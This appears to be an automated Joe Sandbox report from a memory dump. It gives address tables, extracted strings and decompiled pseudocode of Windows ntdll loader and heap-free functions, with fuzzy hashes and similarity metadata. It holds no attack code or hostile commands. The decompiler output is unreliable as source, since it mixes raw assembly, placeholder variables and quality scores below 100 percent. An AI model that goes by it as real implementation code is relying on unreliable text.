0x0465179c
0x00000000
0x04651764
0x04651741
0x04651746
0x04651748
0x00000000
0x00000000
0x04651754
0x00000000
0x04651754
0x04651703
0x04651710
0x04651710
0x04651713
0x00000000
0x00000000
0x04651708
0x0465170a
0x0465170c
0x0465171c
0x0465171c
0x0465171d
0x0465171f
0x04651727
0x00000000
0x04651727
0x0465170e
0x0465170e
0x04651715
0x00000000
0x04651715
0x046516cc
0x04609a45
0x04609a45
0x04609a0e
0x04609a1c
0x04609a23
0x0465167e
0x0465167f
0x04651681
0x04651683
0x04651684
0x00000000
0x04651684
0x00000000
0x04609aad
0x04609aad
0x04609ab0
0x04609ab3
0x04609ab3
0x04609ab6
0x00000000
0x00000000
0x04609ab8
0x04609aba
0x04609abc
0x04609ac8
0x04609ac8
0x00000000
0x04609abe
0x04609abe
0x04609ac0
0x00000000
0x04609ac0
0x04609abc
0x04609ad2
0x00000000
0x04609ad2
0x04609aab

Strings

HEAP: , xrefs: 0465155D, 04651624, 046517C9, 04651912
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 04651572, 04651639, 046517DE, 04651927
HEAP[%wZ]: , xrefs: 04651550, 04651617, 046517BC, 04651905

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 08cc8ace16af466523c2512151f0811eb4d3b952a67aedb2a57a36f50d05fd28
Instruction ID: 63a520060a48813c2701aa14a016972054bf63c956872b31ace2c3e518489475
Opcode Fuzzy Hash: 08cc8ace16af466523c2512151f0811eb4d3b952a67aedb2a57a36f50d05fd28
Instruction Fuzzy Hash: 4B22F4B0A002469FEB28CF68C494BBAB7B5EF45704F14856DE8558B392F735F885CB50

Uniqueness

Uniqueness Score: -1.00%

Function 045F8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E045F8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E045F934A() != 0) {
								_t159 = E0466A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x46d5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04665510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x46d5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E045F849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E045F8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E045F8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x46d5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x46d5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04602280(_t92, 0x46d86cc);
															_t94 = E046B9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E046161A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x46d5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E045F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x46d5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x46d5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0462F380(_t136, 0x45c1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04602280(_t108, 0x46d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E046161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E046B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E045FFFB0(_t118, _t156, 0x46d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04629A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x045f8799
0x045f879d
0x045f87a1
0x045f87a3
0x045f87a8
0x045f87c3
0x045f87c3
0x045f87c8
0x045f87d1
0x045f87d4
0x045f87d8
0x045f87e5
0x045f87ec
0x04649bfe
0x04649c00
0x04649c02
0x04649c08
0x04649c0d
0x04649c0f
0x04649c14
0x04649c2d
0x04649c32
0x04649c37
0x04649c3a
0x04649c3c
0x04649c42
0x04649c42
0x04649c3c
0x04649c02
0x045f87da
0x045f87df
0x045f87e3
0x00000000
0x00000000
0x045f87e3
0x045f87f2
0x00000000
0x045f87fb
0x045f87fd
0x045f87fe
0x045f880e
0x045f880f
0x045f8810
0x045f8814
0x045f881a
0x045f881c
0x045f881f
0x045f8821
0x045f8822
0x045f8824
0x045f8826
0x045f882c
0x045f882e
0x04649c48
0x04649c48
0x045f8834
0x045f8834
0x045f8837
0x00000000
0x00000000
0x045f8837
0x045f882e
0x045f883d
0x045f8840
0x045f8843
0x045f8846
0x045f8849
0x045f884c
0x045f884e
0x045f8850
0x045f8852
0x045f8854
0x045f8857
0x045f88b4
0x045f88b6
0x045f88b6
0x045f8859
0x045f8859
0x045f8859
0x045f8861
0x045f8866
0x045f886a
0x045f893d
0x045f8941
0x00000000
0x045f8947
0x045f8947
0x045f894a
0x045f894c
0x00000000
0x045f8952
0x045f8955
0x045f895a
0x045f895d
0x045f895d
0x045f895f
0x045f8961
0x045f8961
0x045f8968
0x00000000
0x00000000
0x045f896a
0x045f896b
0x045f896e
0x00000000
0x045f8970
0x045f8970
0x045f8970
0x045f8970
0x045f8972
0x045f8972
0x045f8974
0x00000000
0x045f897a
0x045f897a
0x045f897d
0x00000000
0x045f8983
0x04649c65
0x04649c6d
0x04649c72
0x04649c75
0x04649c75
0x04649c82
0x04649c86
0x04649c87
0x04649c88
0x04649c89
0x04649c8c
0x04649c90
0x04649c95
0x04649c97
0x04649ca0
0x04649ca3
0x04649ca9
0x04649ca9
0x00000000
0x04649ca9
0x04649ca3
0x00000000
0x04649c97
0x045f897d
0x00000000
0x045f8974
0x045f8988
0x045f8992
0x045f8996
0x00000000
0x045f8996
0x045f894c
0x00000000
0x045f8870
0x045f887b
0x045f887d
0x045f887f
0x045f8881
0x045f8884
0x045f8884
0x045f8886
0x045f8889
0x045f888c
0x045f888e
0x045f8891
0x045f8891
0x045f8898
0x00000000
0x00000000
0x045f889a
0x045f889b
0x045f889e
0x00000000
0x00000000
0x045f88a0
0x045f88a8
0x045f88b0
0x045f88b2
0x045f88d3
0x045f88d5
0x00000000
0x045f88d7
0x045f88db
0x045f88dc
0x045f88e0
0x045f88e8
0x045f88ee
0x045f88f0
0x045f88f3
0x045f88fc
0x045f8901
0x045f8906
0x045f890c
0x045f890c
0x045f890f
0x045f8916
0x045f8917
0x045f8918
0x045f8919
0x045f891a
0x045f891f
0x045f8921
0x04649c52
0x04649c55
0x04649c5b
0x04649cac
0x04649cc0
0x04649cc0
0x04649c55
0x045f8927
0x045f8927
0x045f892f
0x045f8933
0x00000000
0x045f88f5
0x045f88f5
0x00000000
0x045f88f7
0x045f88f7
0x045f88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x045f88fa
0x045f88f5
0x045f88f3
0x00000000
0x045f88d5
0x00000000
0x045f88b2
0x045f88c9
0x00000000
0x045f88c9
0x045f887f
0x045f886a
0x045f8857
0x045f8852
0x045f88bf
0x045f88bf
0x045f87aa
0x045f87ad
0x045f87ae
0x045f87b4
0x045f87b5
0x045f87b6
0x045f87b8
0x045f87bd
0x045f87c1
0x045f87f4
0x045f87fa
0x00000000
0x00000000
0x00000000
0x045f87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 04649C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04649C18
minkernel\ntdll\ldrsnap.c, xrefs: 04649C28

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 463c3d4e1e044c46868e59f6f17abb39fe1e4d47408ece991dd2c543a9ca1a9d
Instruction ID: 5a46238185e8a17b59de027c445032a11a3b0708263dbd146046f650bb5e5367
Opcode Fuzzy Hash: 463c3d4e1e044c46868e59f6f17abb39fe1e4d47408ece991dd2c543a9ca1a9d
Instruction Fuzzy Hash: 369135B1A00606EFDF18EF59DC81ABA73B5FF80354B544469DA01AB650E730FD05EB92

Uniqueness

Uniqueness Score: -1.00%

Function 0461AC7B Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0461AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0463D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x46d8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E046296E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E04693C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E046296E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E045EB150();
							} else {
								E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E045EB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E046A14FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E04607D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E046A1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E04607D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E046A1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x0461ac85
0x0461ac88
0x0461ac8a
0x0461ac8d
0x0461ac91
0x0461ac99
0x0461ac9c
0x04659f57
0x04659f5b
0x04659f60
0x04659f60
0x0461aca8
0x0461acae
0x0461acda
0x0461acde
0x0461ace8
0x0461aceb
0x0461acee
0x00000000
0x0461acee
0x0461acf6
0x0461acb0
0x0461acb0
0x0461acbb
0x0461acbd
0x0461acc0
0x0461acc5
0x0461adae
0x0461adb4
0x0461adb4
0x0461acd4
0x0461acd8
0x0461acf9
0x0461acff
0x0461ad04
0x0461ad08
0x0461ad09
0x0461ad10
0x0461ad12
0x0461ad18
0x04659f6f
0x04659f74
0x04659f76
0x04659f7c
0x04659f84
0x04659f88
0x04659f89
0x04659f90
0x04659f90
0x04659f76
0x0461ad1e
0x0461ad24
0x0461ad26
0x0465a097
0x0465a09b
0x0465a0ba
0x0465a0bf
0x0465a09d
0x0465a0b2
0x0465a0b7
0x0465a0c5
0x0465a0c8
0x0465a0cb
0x0465a0d2
0x00000000
0x0461ad2c
0x0461ad2c
0x0461ad2f
0x0461ad34
0x0461ad36
0x04659f97
0x04659f9a
0x00000000
0x00000000
0x04659fa9
0x0461ad3e
0x0461ad3e
0x0461ad41
0x04659fb3
0x04659fb9
0x04659fc0
0x04659fd0
0x04659fd0
0x04659fc0
0x0461ad4a
0x0461ad50
0x0461ad5c
0x0461ad62
0x0461ad68
0x0461ad6b
0x0461ad6d
0x04659fda
0x04659fdd
0x00000000
0x00000000
0x04659fec
0x00000000
0x0461ad73
0x0461ad73
0x0461ad73
0x0461ad75
0x0461ad75
0x0461ad78
0x04659ff6
0x04659ffc
0x0465a003
0x0465a00e
0x0465a010
0x0465a01b
0x0465a01b
0x0465a01b
0x0465a038
0x0465a038
0x0465a003
0x0461ad84
0x0461ad89
0x0461ad8c
0x0461ad8e
0x0465a042
0x0465a045
0x00000000
0x00000000
0x0465a054
0x00000000
0x0461ad94
0x0461ad94
0x0461ad94
0x0461ad96
0x0461ad96
0x0461ad99
0x0465a063
0x0465a065
0x0465a070
0x0465a070
0x0465a070
0x0465a08d
0x0465a08d
0x0461ada4
0x0461ada6
0x00000000
0x0461ada6
0x0461ad8e
0x0461ad6d
0x0461ad3c
0x0461ad3c
0x00000000
0x0461ad3c
0x00000000
0x00000000
0x00000000
0x0461acd8

Strings

HEAP: , xrefs: 0465A0BA
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0465A0CD
HEAP[%wZ]: , xrefs: 0465A0AD

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: ccb5a41b3e0af7c0a19b36b084ddb57c2ed14e321de6ab62903ab319a21e5a14
Instruction ID: 77ec1e6be69be46d673199e4f5b5cccdd0a0418da1e6ea27bb77ee690876224b
Opcode Fuzzy Hash: ccb5a41b3e0af7c0a19b36b084ddb57c2ed14e321de6ab62903ab319a21e5a14
Instruction Fuzzy Hash: 6D81D371601A84EFE726CBA8C994BA9B7F4FF04714F0841A9E9518B7A1F774FA40DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0460B73D Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0460B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E046AA80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x46d8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E045EB150();
					} else {
						E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E045EB150();
					__eflags =  *0x46d7bc8;
					if(__eflags == 0) {
						E046A2073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E046AA80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x46d8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x46d8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0460B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E046AA80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0460E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x0460b746
0x0460b74b
